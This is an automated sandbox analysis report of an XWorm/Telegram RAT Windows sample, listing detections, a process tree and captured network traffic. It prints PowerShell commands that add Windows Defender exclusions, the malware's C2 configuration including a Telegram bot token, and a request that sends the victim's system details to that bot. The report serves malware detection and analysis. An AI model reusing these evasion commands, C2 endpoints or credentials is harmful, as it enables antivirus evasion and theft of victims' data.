Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2QaN4hOyJs.exe

Overview

General Information

Sample name:2QaN4hOyJs.exe
renamed because original name is a hash value
Original sample name:712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e.exe
Analysis ID:1579078
MD5:0999f25f0123e520bb0259a5741f621b
SHA1:27a3fd47f336dbf4663cbbe1bbde7a3e76179247
SHA256:712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2QaN4hOyJs.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\2QaN4hOyJs.exe" MD5: 0999F25F0123E520BB0259A5741F621B)
    • powershell.exe (PID: 7724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/4X62dQQ8"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
2QaN4hOyJs.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    2QaN4hOyJs.exeJoeSecurity_XWormYara detected XWormJoe Security
      2QaN4hOyJs.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        2QaN4hOyJs.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          2QaN4hOyJs.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8efa:$s6: VirtualBox
          • 0x8e58:$s8: Win32_ComputerSystem
          • 0x99c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x9a61:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x9b76:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x9556:$cnc4: POST / HTTP/1.1

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            C:\Users\user\AppData\Local\Temp\SystemJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
              C:\Users\user\AppData\Local\Temp\SystemJoeSecurity_XWormYara detected XWormJoe Security
                C:\Users\user\AppData\Local\Temp\SystemJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  C:\Users\user\AppData\Local\Temp\SystemJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    C:\Users\user\AppData\Local\Temp\SystemMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x8efa:$s6: VirtualBox
                    • 0x8e58:$s8: Win32_ComputerSystem
                    • 0x99c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x9a61:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x9b76:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x9556:$cnc4: POST / HTTP/1.1

                    Memory Dumps

                    SourceRuleDescriptionAuthorStrings
                    00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                      00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                        00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0x8cfa:$s6: VirtualBox
                        • 0x8c58:$s8: Win32_ComputerSystem
                        • 0x97c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x9861:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x9976:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0x9356:$cnc4: POST / HTTP/1.1
                        00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                          00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            Click to see the 4 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            0.2.2QaN4hOyJs.exe.131a1a78.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                              0.2.2QaN4hOyJs.exe.131a1a78.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                0.2.2QaN4hOyJs.exe.131a1a78.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                                • 0x70fa:$s6: VirtualBox
                                • 0x7058:$s8: Win32_ComputerSystem
                                • 0x7bc4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                • 0x7c61:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                                • 0x7d76:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                                • 0x7756:$cnc4: POST / HTTP/1.1
                                0.0.2QaN4hOyJs.exe.e40000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                                  0.0.2QaN4hOyJs.exe.e40000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                    Click to see the 6 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe
                                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', ProcessId: 2976, ProcessName: powershell.exe
                                    Sigma detected: Suspicious Script Execution From Temp Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System', ProcessId: 2976, ProcessName: powershell.exe
                                    Sigma detected: Change PowerShell Policies to an Insecure Level
                                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe
                                    Sigma detected: Startup Folder File Write
                                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\2QaN4hOyJs.exe, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2QaN4hOyJs.exe", ParentImage: C:\Users\user\Desktop\2QaN4hOyJs.exe, ParentProcessId: 7544, ParentProcessName: 2QaN4hOyJs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe', ProcessId: 7724, ProcessName: powershell.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-20T19:15:05.861207+010028536851A Network Trojan was detected192.168.2.949854149.154.167.220443TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: 2QaN4hOyJs.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SystemAvira: detection malicious, Label: TR/Spy.Gen
                                    Found malware configuration
                                    Source: 2QaN4hOyJs.exeMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/4X62dQQ8"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                                    Source: 2QaN4hOyJs.exe.7544.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SystemReversingLabs: Detection: 81%
                                    Multi AV Scanner detection for submitted file
                                    Source: 2QaN4hOyJs.exeReversingLabs: Detection: 81%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SystemJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: 2QaN4hOyJs.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 2QaN4hOyJs.exeString decryptor: https://pastebin.com/raw/4X62dQQ8
                                    Source: 2QaN4hOyJs.exeString decryptor: <123456789>
                                    Source: 2QaN4hOyJs.exeString decryptor: <Xwormmm>
                                    Source: 2QaN4hOyJs.exeString decryptor: System
                                    Source: 2QaN4hOyJs.exeString decryptor: USB.exe
                                    Source: 2QaN4hOyJs.exeString decryptor: %Temp%
                                    Source: 2QaN4hOyJs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49849 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49854 version: TLS 1.2
                                    Source: 2QaN4hOyJs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.9:49854 -> 149.154.167.220:443
                                    C2 URLs / IPs found in malware configuration
                                    Source: Malware configuration extractorURLs: https://pastebin.com/raw/4X62dQQ8
                                    Connects to a pastebin service (likely for C&C)
                                    Source: unknownDNS query: name: pastebin.com
                                    Uses the Telegram API (likely for C&C communication)
                                    Source: unknownDNS query: name: api.telegram.org
                                    Yara detected Generic Downloader
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
                                    Source: global trafficHTTP traffic detected: GET /raw/4X62dQQ8 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=7705511583&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4AB9DA9F1C2993F263A7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%205BNYU1CK1%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20System HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ip-api.com
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficHTTP traffic detected: GET /raw/4X62dQQ8 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=7705511583&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4AB9DA9F1C2993F263A7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%205BNYU1CK1%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20System HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                    Source: global trafficDNS traffic detected: DNS query: Brian123121-27796.portmap.io
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Fri, 20 Dec 2024 18:15:05 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                    Source: powershell.exe, 00000005.00000002.1559162610.000001FEF5C34000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1923662075.000002B8618B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                                    Source: powershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                    Source: powershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                    Source: powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsm
                                    Source: 2QaN4hOyJs.exe, System.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                    Source: powershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000000C.00000002.1923414066.000002B861888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coFA
                                    Source: powershell.exe, 0000000C.00000002.1926579498.000002B861950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coL
                                    Source: powershell.exe, 00000005.00000002.1559162610.000001FEF5CC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coi
